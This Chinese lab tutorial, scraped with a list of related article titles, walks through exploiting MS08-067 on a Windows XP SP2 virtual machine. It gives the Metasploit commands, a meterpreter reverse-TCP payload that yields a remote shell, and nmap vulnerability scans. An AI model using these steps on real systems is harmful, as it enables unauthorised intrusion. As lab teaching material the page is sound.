Metasploit 攻击winXP
来源:互联网 发布:c templates 源码 编辑:程序博客网 时间:2024/04/25 01:58
本次实验会用到以下资源:
Kali linux 镜像
windows XP SP2 镜像
进入kali linux进行渗透:
# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST TARGETIP
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST YOURIP
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.71.105:4445
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 1 opened (192.168.71.105:4445 -> 192.168.71.112:1036) at 2016-01-06 14:06:04 +0800
meterpreter > shell
Process 392 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
以上就是渗透过程,如果最终没有显示出 meterpreter,则说明渗透不成功,可以参考以下步骤进行:
扫描靶机漏洞端口是否可以攻击
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1TARGETIP
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 12:35 HKT
Nmap scan report for localhost (192.168.71.113)
Host is up (0.00039s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BE:48:2C (VMware)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; got error SMB: ERROR: Server returned NT_STATUS_PIPE_NOT_AVAILABLE too many times; giving up.
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
结果中并没有 MS08-067: VULNERABLE,所以无法利用,注意本实验用的是MS08-067漏洞,windows xp sp2是有的。
换成 xp sp2 继续扫描:
nmap -p 445 -script smb-check-vulns -script-args=unsafe=1TARGETIP
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:00 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
如果端口状态为 filtered,则是被防火墙屏蔽,此时我们可以关闭靶机的防火墙,继续扫描:
输出结果:
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-06 14:04 HKT
Nmap scan report for localhost (192.168.71.112)
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:06:7B:67 (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Nmap done: 1 IP address (1 host up) scanned in 6.11 seconds
漏洞可用,此时可按照上面的步骤进行渗透。
- Metasploit 攻击winXP
- 使用MetaSploit在WinXP对Win2000进行攻击
- Metasploit 攻击
- Kali渗透测试——利用metasploit攻击靶机WinXP SP1
- metasploit 自动攻击
- 利用metasploit通过ms_08_067_netapi漏洞渗透winXp
- 缓冲区溢出攻击框架Metasploit
- metasploit 攻击成功的实例
- metasploit的令牌假冒攻击
- metasploit的WEB攻击向量
- metasploit的客户端WEB攻击
- 初探Metasploit的自动攻击
- 利用Metasploit来攻击Mysql
- 初探Metasploit的自动攻击
- Metasploit攻击Oracle的环境搭建
- metasploit隐秘地启动一个攻击载荷
- metasploit文件格式漏洞渗透攻击(失败)
- metasploit针对性钓鱼攻击向量入侵成功
- 域安全篇:寻找SYSVOL里的密码和攻击GPP(组策略偏好)
- java.io.EOFException的解决办法
- oracle在SERIALIZABLE级别上事务的特殊性与ORA-08177
- React Native入门——组件构成及生命周期简介
- 安装mysql, 如何解决在centos上面用yum不能安装redis
- Metasploit 攻击winXP
- 【bzoj1264】【基因匹配Match】【dp+树状数组】
- Android的Activity屏幕切换动画-左右滑动切换
- linux系统稳定性测试-sysbench-磁盘IO性能测试-随机读
- leetcode第11题——**Container With Most Water
- android studio下载的好地址
- 关于Hibernate中的Configuration
- Codevs_P1922 骑士共存问题(Dinic算法最大流+二分图匹配)
- BZOJ 2241: [SDOI2011]打地鼠